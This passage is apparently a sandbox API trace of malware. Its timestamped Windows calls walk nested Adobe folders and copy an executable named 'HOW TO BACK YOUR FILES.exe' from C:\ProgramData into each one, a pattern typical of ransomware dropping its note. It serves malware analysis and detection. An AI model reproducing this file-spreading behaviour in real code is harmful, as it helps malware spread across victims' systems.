Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x680f5660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x680f5660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.580] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.580] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.580] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0091.580] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0091.580] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0091.581] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned 126 [0091.581] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0091.581] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.581] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.581] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.581] GetLastError () returned 0x0 [0091.581] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.582] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.582] CloseHandle (hObject=0x120) returned 1 [0091.582] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.582] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.582] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.582] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.582] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.582] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" [0091.582] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0091.582] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0091.582] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned 130 [0091.582] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" [0091.582] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.582] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.583] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.583] GetLastError () returned 0x0 [0091.583] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.583] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.583] CloseHandle (hObject=0x120) returned 1 [0091.583] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.583] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.583] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.583] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.583] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.584] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" [0091.584] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fc8 | out: hHeap=0x2b0000) returned 1 [0091.584] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0091.584] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned 144 [0091.584] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" [0091.584] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.584] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\reader_10.0.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.584] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.585] GetLastError () returned 0x0 [0091.585] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.585] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.585] CloseHandle (hObject=0x120) returned 1 [0091.585] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.585] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.585] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x67f06480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x67f06480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.585] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.585] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.585] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0091.585] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0091.585] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0091.585] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned 134 [0091.585] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0091.585] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.585] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.586] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.586] GetLastError () returned 0x0 [0091.586] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.586] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.586] CloseHandle (hObject=0x120) returned 1 [0091.586] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.586] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.586] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.587] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.587] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.587] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0091.587] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0710 | out: hHeap=0x2b0000) returned 1 [0091.587] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0091.587] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned 139 [0091.587] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0091.587] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.587] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.587] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.588] GetLastError () returned 0x0 [0091.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.588] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.588] CloseHandle (hObject=0x120) returned 1 [0091.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.588] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.588] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.588] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.588] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.588] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0091.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0091.588] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned 149 [0091.588] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.588] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.588] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.589] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.589] GetLastError () returned 0x0 [0091.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.589] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.589] CloseHandle (hObject=0x120) returned 1 [0091.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.589] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.590] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.590] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.590] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.590] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0091.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0091.590] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned 158 [0091.590] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.590] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.590] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\security\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.591] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.591] GetLastError () returned 0x0 [0091.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.591] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.591] CloseHandle (hObject=0x120) returned 1 [0091.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.591] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.591] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x680f5660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x680f5660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.591] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.591] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.591] lstrcpynW (in: 